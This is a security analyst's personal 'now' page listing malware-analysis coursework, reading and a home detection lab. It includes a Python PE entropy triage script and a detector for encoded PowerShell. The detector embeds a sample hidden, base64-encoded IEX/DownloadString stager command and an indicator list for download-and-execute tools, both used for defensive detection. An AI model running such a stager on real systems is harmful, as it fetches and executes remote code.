// CURRENTLY
What I'm working on right now
A living page — what I'm learning, reading, building, and breaking. Inspired by Derek Sivers' /now movement. Updated monthly so you always get the freshest version of me, not a stale resume.
Learning
Practical Malware Analysis & Triage
TCM Security · Matt Kiely (HuskyHacks)
Going deep on static and dynamic malware analysis. The course flips the typical analyst mindset — instead of waiting for an alert, you tear apart the binary, watch what it does, and write the detection that catches the next variant.
Currently working through PE structure analysis with PE-bear, behavioral triage in a controlled VM, and stepping through unpacking routines in x32dbg. Next up: Ghidra for proper reverse engineering and writing my first non-trivial YARA rules.
Progress: Module 5 of 12 (~42%)
Tools: x32dbg, Ghidra, PE-bear, YARA, FLOSS, sandboxing
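An added example of the static side of that triage, written for this page rather than taken from the course or from PE-bear: a minimal PE section-table parser that scores each section's Shannon entropy, the same heuristic PE-bear and similar tools surface when you are deciding whether a sample is packed before stepping into its unpacking routine. The builder and the sample binary are constructed scaffolding so it runs offline (a header-only PE32+ with no imports or entry point, not loadable); the 7.0 threshold is my assumption and should be tuned against real samples.

```python
import hashlib
import math
import struct
from collections import Counter

# PE/COFF layout constants (offsets and sizes from the PE format specification).
DOS_HEADER_LEN = 64
E_LFANEW_OFFSET = 0x3C
PE_SIGNATURE = b"PE\0\0"
COFF_HEADER_LEN = 20
SECTION_HEADER_LEN = 40
FILE_ALIGNMENT = 0x200
SECTION_ALIGNMENT = 0x1000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
PACKED_ENTROPY_THRESHOLD = 7.0  # assumption: common triage cutoff, tune for your sample set


def align(value: int, boundary: int) -> int:
    return (value + boundary - 1) // boundary * boundary


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for perfectly uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table, scoring each section."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", pe, E_LFANEW_OFFSET)
    if pe[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("missing PE signature at e_lfanew")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", pe, coff + 2)   # NumberOfSections
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)      # SizeOfOptionalHeader
    table = coff + COFF_HEADER_LEN + opt_size
    sections = []
    for i in range(num_sections):
        name, vsize, vaddr, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, table + i * SECTION_HEADER_LEN)
        # Slicing clamps to EOF, so a lying PointerToRawData cannot make us read past the file.
        ent = shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": vaddr,
            "raw_size": raw_size,
            "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE),
            "entropy": round(ent, 3),
            "likely_packed": ent > PACKED_ENTROPY_THRESHOLD,
        })
    return sections


def build_pe(sections: list) -> bytes:
    """Assemble a PE32+ shaped file from (name, data, characteristics) triples. Header-only
    scaffolding: enough structure for the parser above, not a loadable image."""
    dos = b"MZ" + b"\0" * (E_LFANEW_OFFSET - 2) + struct.pack("<I", DOS_HEADER_LEN)
    opt_size = 0xF0  # PE32+ optional header size
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x0022)
    opt = struct.pack("<H", 0x20B) + b"\0" * (opt_size - 2)  # Magic for PE32+, rest zeroed
    headers_len = DOS_HEADER_LEN + 4 + COFF_HEADER_LEN + opt_size + SECTION_HEADER_LEN * len(sections)
    raw_ptr, vaddr = align(headers_len, FILE_ALIGNMENT), SECTION_ALIGNMENT
    table, body = b"", b""
    for name, data, chars in sections:
        raw_size = align(len(data), FILE_ALIGNMENT)
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), vaddr,
                             raw_size, raw_ptr, 0, 0, 0, 0, chars)
        body += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        vaddr += align(len(data), SECTION_ALIGNMENT)
    headers = dos + PE_SIGNATURE + coff + opt + table
    return headers.ljust(align(headers_len, FILE_ALIGNMENT), b"\0") + body


def pseudo_random_bytes(n: int, seed: bytes = b"now-page") -> bytes:
    """Deterministic high-entropy filler (chained SHA-256) standing in for a packed payload."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_sample_pe() -> bytes:
    """Constructed sample: readable .text beside a high-entropy .data, the shape a packer stub leaves."""
    text = b"hello from .text, nothing to see here\x90\x90\x90\x90" * 32
    return build_pe([
        (b".text", text, 0x60000020),                       # CODE | EXECUTE | READ
        (b".data", pseudo_random_bytes(4096), 0xC0000040),  # INITIALIZED_DATA | READ | WRITE
    ])


if __name__ == "__main__":
    for s in parse_sections(build_sample_pe()):
        print(f'{s["name"]:<8} va={s["virtual_address"]:#x} raw={s["raw_size"]:#x} '
              f'exec={s["executable"]} H={s["entropy"]:.2f} {"PACKED?" if s["likely_packed"] else "ok"}')
```

Entropy alone is a triage signal, not a verdict: compressed resources and embedded certificates score high too, so the next step is what the course covers next, stepping the stub in x32dbg to the point where the real code is written back into memory.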
BTL2 — Blue Team Level 2
Security Blue Team
Next up after malware analysis. The natural progression from CDSA — deeper threat hunting, advanced phishing analysis, threat intel, and digital forensics. Targeting completion by Q3 2026.
Reading
- Practical Threat Intelligence and Data-Driven Threat Hunting · Valentina Costa-Gazcón // teaches you to hunt with hypotheses instead of alert-chasing — already changed how I read TI reports
- The Cuckoo's Egg · Cliff Stoll // foundational. proof that good incident response has always been about curiosity + meticulous notes
- Daily reads: The DFIR Report, Microsoft Threat Intelligence Blog, BushidoToken, Red Canary's "Threat Detection Reports"
Building
Home Lab — Wazuh + Sysmon + Atomic Red Team
Personal project · ongoing
Setting up a small Windows + Linux environment with Wazuh as the SIEM, Sysmon shipping rich telemetry, and Atomic Red Team for safe TTP simulation. The goal: detonate a technique, see what shows up in logs, write the detection, repeat.
Half the value is the muscle memory of building it from scratch — the other half is having a place to test the YARA rules I'm writing in TCM's course.
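An added example of the "write the detection" step in that loop, mine rather than a Wazuh rule or an Atomic Red Team file: a small scanner over Sysmon Event ID 1 (process creation) records that finds PowerShell launched with -EncodedCommand, decodes the base64/UTF-16LE payload, and checks it for download-and-execute indicators. The event shape is an assumed, flattened subset of what Wazuh forwards from Sysmon (the key names are mine, not Wazuh's decoder fields), the sample events are constructed, and the loopback URL is hypothetical. In the lab, an encoded-PowerShell atomic would leave the fourth kind of event; the third shows why you decode before alerting, and the fifth why a failed decode must still surface.

```python
import base64
import re
from typing import List, Optional

# Indicators to look for in the decoded script: a starting set, not a complete rule.
INDICATORS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
              "frombase64string", "invoke-webrequest", "start-bitstransfer")
# -EncodedCommand and the prefixes powershell.exe accepts for it (-e, -ec, -enc, ...),
# followed by whatever token comes next; validation happens in the decoder.
ENC_FLAG = re.compile(r"(?:^|\s)[-/]e(?:c|n[a-z]*)?\s+(\S+)", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"[-/]w(?:indowstyle)?\s+hidden", re.IGNORECASE)


def encode_ps(script: str) -> str:
    """What -EncodedCommand expects: base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_b64_utf16(token: str) -> Optional[str]:
    """Reverse of encode_ps; None if the token is not something PowerShell could have run."""
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        return raw.decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_events(events: List[dict]) -> List[dict]:
    """One finding per PowerShell process-creation event that used -EncodedCommand."""
    findings = []
    for ev in events:
        image = ev.get("image", "").lower()
        if ev.get("event_id") != 1 or not image.endswith(("powershell.exe", "pwsh.exe")):
            continue
        cmd = ev.get("command_line", "")
        m = ENC_FLAG.search(cmd)
        if not m:
            continue
        decoded = decode_b64_utf16(m.group(1))
        if decoded is None:
            # Keep this visible: a payload we cannot decode is not the same as a benign one.
            indicators = ["undecodable-encodedcommand"]
        else:
            lowered = decoded.lower()
            indicators = [k for k in INDICATORS if k in lowered]
        if HIDDEN_WINDOW.search(cmd):
            indicators.append("hidden-window")
        findings.append({"parent_image": ev.get("parent_image"), "decoded": decoded,
                         "indicators": indicators, "alert": bool(indicators)})
    return findings


# Constructed sample telemetry, not real captures. Assumption: a flattened subset of the
# Sysmon Event ID 1 fields Wazuh forwards; the key names here are mine, not Wazuh's.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"event_id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": r"cmd.exe /c dir C:\Users"},
    {"event_id": 1, "image": PS, "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"event_id": 1, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -enc " + encode_ps("Get-Date")},
    {"event_id": 1, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     # Hypothetical loopback URL standing in for the stager an atomic test would fetch.
     "command_line": "powershell.exe -nop -w hidden -e " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8000/stage.ps1')")},
    {"event_id": 1, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -EncodedCommand not_base64!!"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print("ALERT" if f["alert"] else "info ", f["indicators"], "<-", f["decoded"])
```

Decode before matching: a SIEM rule that greps the raw command line for DownloadString never sees it inside the base64 blob, which is exactly why the technique exists. The parent image is carried through so the next iteration of the loop can add the context a real rule needs (Office or browser parents score higher than a scheduled task).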
Goals · 2026
- HTB CDSA: cleared March 2026
- Finish TCM Malware Analysis: ~42% complete
- Pass BTL2: target Q3 2026
- Publish 6 detection rules to GitHub: 1 of 6
- Write 3 deep-dive blog posts: 1 of 3 (CPUID done)
- Speak at one local meetup: looking for a topic + venue
Mindset
Defenders only have to be wrong once. Attackers only have to be right once. The asymmetry is real — but the way you close it is by reading more reports, writing more rules, and letting curiosity outpace burnout.
— me, to myself, after every shift
Thanks for caring enough to read this far.
Want to chat threat hunting, malware analysis, or anything blue-team? Say hi or find me on LinkedIn.